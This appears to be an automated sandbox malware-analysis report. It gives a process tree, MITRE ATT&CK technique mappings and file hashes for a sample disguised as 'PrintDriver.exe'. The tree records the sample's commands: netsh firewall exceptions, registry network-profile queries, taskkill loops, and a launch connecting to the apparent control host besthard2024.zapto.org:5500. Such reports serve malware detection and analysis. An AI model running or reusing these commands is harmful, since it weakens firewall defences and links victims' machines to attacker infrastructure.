C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description2⤵
- Suspicious use of WriteProcessMemory
PID:2300 -
C:\Windows\system32\reg.exeReg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description3⤵PID:1996
-
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where (name="PrintDriver.exe") get commandline2⤵PID:2156
-
-
C:\Windows\system32\findstr.exefindstr /i "PrintDriver.exe"2⤵PID:2072
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" type C:\Games\PrintDriver.txt"2⤵PID:2652
-
-
C:\Windows\system32\cmd.execmd2⤵
- Loads dropped DLL
PID:2788 -
C:\Windows\system32\mode.comMode 90,203⤵PID:2976
-
-
C:\Windows\system32\netsh.exenetsh firewall add allowedprogram program="C:\Games\PrintDriver.exe" name="MyApplication" mode=ENABLE scope=ALL3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:2904
-
-
C:\Windows\system32\netsh.exenetsh firewall add allowedprogram program="C:\Games\PrintDriver.exe" name="MyApplicatio" mode=ENABLE scope=ALL profile=ALL3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:2728
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where (name="PrintDriver.exe") get commandline3⤵PID:532
-
-
C:\Windows\system32\findstr.exefindstr /i "PrintDriver.exe"3⤵PID:2924
-
-
C:\Games\PrintDriver.exeC:\Games\PrintDriver.exe -autoreconnect ID:5977412 -connect besthard2024.zapto.org:5500 -run3⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:780
-
-
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
PID:2956
-
-
C:\Windows\system32\taskkill.exetaskkill /im rundll32.exe /f2⤵
- Kills process with taskkill
PID:2972
-
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
PID:1388
-
-
C:\Windows\system32\taskkill.exetaskkill /im rundll32.exe /f2⤵
- Kills process with taskkill
PID:2076
-
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
PID:2212
-
-
C:\Windows\system32\taskkill.exetaskkill /im rundll32.exe /f2⤵
- Kills process with taskkill
PID:2256
-
-
C:\Games\PrintDrivers.exeC:\Games\PrintDrivers.exe /HideWindow C:\Games\driverhelp.cmd2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1152
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Games\driverhelp.cmd" "1⤵PID:1520
-
C:\Windows\system32\mode.comMode 90,202⤵PID:2160
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul2⤵PID:1324
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description2⤵PID:1936
-
C:\Windows\system32\reg.exeReg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description3⤵PID:2712
-
-
-
C:\Windows\system32\timeout.exetimeout /t 202⤵
- Delays execution with timeout.exe
PID:1368
-
-
C:\Windows\system32\timeout.exetimeout /t 202⤵
- Delays execution with timeout.exe
PID:1320
-
-
C:\Windows\system32\timeout.exetimeout /t 202⤵
- Delays execution with timeout.exe
PID:1380
-
-
C:\Windows\system32\timeout.exetimeout /t 202⤵
- Delays execution with timeout.exe
PID:1864
-
-
C:\Windows\system32\timeout.exetimeout /t 202⤵
- Delays execution with timeout.exe
PID:2232
-
-
C:\Windows\system32\timeout.exetimeout /t 202⤵
- Delays execution with timeout.exe
PID:2288
-
-
C:\Windows\system32\timeout.exetimeout /t 202⤵
- Delays execution with timeout.exe
PID:2484
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Netsh Helper DLL
1Privilege Escalation
Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Netsh Helper DLL
1Defense Evasion
Hide Artifacts
1Hidden Files and Directories
1Impair Defenses
2Disable or Modify System Firewall
1Disable or Modify Tools
1Modify Registry
2Subvert Trust Controls
1Install Root Certificate
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
422KB
MD516cc2a71edf33537200927aebbdfd7e8
SHA1023f1a2c3c45aa3a6c63bafa19be6b52f84d3a8e
SHA25643533d0477a914cdf44d0df9ad97b650d629c81b2f9f605321530d5315e66913
SHA51280811911300020dfc3e3ddef82853b40429f3bda1e8882c9138791859b0461e20ddf0f7c0002d3c8008e0cf9e3f4f077c8a304736bb4521a91f7d58590045ff3
-
Filesize
1KB
MD56eb13f7936a83f4c44842029914aad6e
SHA17b9b27731d4ca6f996ce68c5d68b4d653e31d915
SHA2568d9bb49947d9dc7fa7be7310149a99f13a0c02580fd996aae31c69d673775c49
SHA512227788193867b2f99a62ae792d91562ad46ea3fa0855cf6ef28fc0de31d43f2e671c6ef50e534f0235f1f663769715bef162913a554e86e581fe05455373623e
-
Filesize
1KB
MD5eacc690f71a77685f030bef23b506b91
SHA103b911ba997d44028bf515ea44fe4813b4b4a785
SHA2560f1d30740f2e46b22b86fb01acdabbd02440d7dbebe963a405fb3a5661b23263
SHA5129870aa4dc699b74bfc8fb53df0c74686913f42ea2321bee39786e5be696fb081e3dfdac1b312f3c439c14e3061f35cefe820ef1ac5c853274ca0c867bf50a54d
-
Filesize
403KB
MD529ed7d64ce8003c0139cccb04d9af7f0
SHA18172071a639681934d3dc77189eb88a04c8bcfac
SHA256e48aac5148b261371c714b9e00268809832e4f82d23748e44f5cfbbf20ca3d3f
SHA5124bdd4bf57eaf0c9914e483e160182db7f2581b0e2adc133885bf0f364123d849d247d3f077a58d930e80502a7f27f1457f7e2502d466aec80a4fbeebd0b59415
-
Filesize
1KB
MD5cb5b8a5789c15957c039ff3ce988c1a2
SHA14de9a626f04bc7c619fdb68e5585739855ded2d1
SHA256a11a72865948a8d6a88df530108c3b8ba3e8b4ac6316ac22443af81fa1c3daf4
SHA51268dd583237ea70702d76d9a2a607bbb8f2e2a1e4285de347b4e23faa0063b51f20f5a84cbe907ef4c123eba0add1c99cb4f9f1e13ddff97b34bb1e7c18825e32
-
Filesize
870B
MD5fd3b5847ddb8a31413951c0aa870ab95
SHA1e3e91e3e9fa442cd1937422120de91da87973ddb
SHA256e4f5e16dfe9bbe6d63f266103c35c0035a2d4014f516420190b7cfafb02b08ad
SHA5125d8599f7d6f0824ab30118f5680bf89d28c1e7e9de4ed61af9074cb9d339619d59dab8e5818dc93dcf5b27ad9e8a863c5d082f8f829aa8c4a026ec5da2454096
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD5753c495cc6c85f69353e4dea8d28c613
SHA19cf7bec9a284123b6f9b2c714bf2703d9d860c2e
SHA256be508c93f26ccaff29838a1dfaac2169352cfac13e99942349f4c126617fd813
SHA5122147d4f56440b90fe4f73aeba521deb1c9ec7e11b6c5314548e592e4daaf61691e3e1f12c8c9c4260bd640b92c93c7b72dc69091a1c48a2e327d1e44b12f0805
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD5232f738aac698f1b035437e566817ba6
SHA1eabf13ec1b8e9210486a945fd8d78d46f3ae8780
SHA25647bd8f01a8e9b73055082f8e88d374d42880881001a9e375fb4d61a051f65477
SHA512f90962f454b91153ad7dfa8a648259b26d30c511881d8282fd22428d182dfbd644946b45c6daeeb89409ea6c3cf469a9b66e6bbd6cfc9da7d34651b8012857c9
-
Filesize
6.7MB
MD5e21b2080c98beb0f04307a5a25630e23
SHA18fc24ad51e8d61324fe8de1be667862e9238cbbb
SHA2560dbeaab616c483b81d9e9ed8dda14a3a8f3b024130f8fab840e7b9f3a7b1787e
SHA5123706fde6569bccb39e2c58e86c60050c73bcdbe5c7eb05849ced33c75b5a1c3b080746c2e27420c6fffcd3497e1b1b6ab87e1b2d371a80fa3ae27851a64cfbea
-
Filesize
70KB
MD549aebf8cbd62d92ac215b2923fb1b9f5
SHA11723be06719828dda65ad804298d0431f6aff976
SHA256b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b
-
Filesize
369B
MD51a882ccb67172a36f7e80d710ea09fd3
SHA18021ff845a39e43888aba493e462752dc2155667
SHA256a89471a2101ae88db197cae158d367d7be5c11f8479818558fd3434a7e592b32
SHA512473b0d7210525e216df2e9a66b4528bbcb21b7d0e28116b8fedfaf3b2f419a709eebae3c38646eb4b1d5b42a659e37a2a1ea8d34a61461090262a04027b44522
-
Filesize
997KB
MD5ec6ebf65fe4f361a73e473f46730e05c
SHA101f946dfbf773f977af5ade7c27fffc7fe311149
SHA256d3614d7bece53e0d408e31da7d9b0ff2f7285a7dd544c778847ed0c5ded5d52f
SHA512e4d7aafa75d07a3071d2739d18b4c2b0a3798f754b339c349db9a6004d031bf02f3970b030cec4a5f55b4c19f03794b0ce186a303d936c222e7e6e8726fffff7
-
Filesize
181KB
MD54ea6026cf93ec6338144661bf1202cd1
SHA1a1dec9044f750ad887935a01430bf49322fbdcb7
SHA2568efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA5126c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b
-
Filesize
418KB
MD5432827ec55428786a447b3d848d963b7
SHA1029901586604f3ab1b0bd18868469a96db0ef470
SHA2565a4e76f840fe7d9872164c6c3ce85f4dd0405e661c04638e0b8a91157398bbf0
SHA512efe03d3446b07180a12d8cd8d0b6d25dd6da5b445c6d61125b0e81c848a98b78f502a6c7c8c7dfc87b3d5beafdea100ac6580e0d28f2cfb99eda90a19449c226
-
Filesize
2.8MB
MD527c1c264c6fce4a5f44419f1783db8e0
SHA1e071486e4dfef3a13f958a252d7000d3ce7bfd89
SHA25629379afd1ca5439c82931d623fda335174dc416e5b013591457fa1f7bbe564db
SHA512a80a512be6f152e8737cd5d0a0a2a193eaf88f3bfb7ed6b7695d227e195db278e2734ebfc9fe48a68cfb13e4e5bb7fb4825019cfa2210ba741ecf8b11f954a98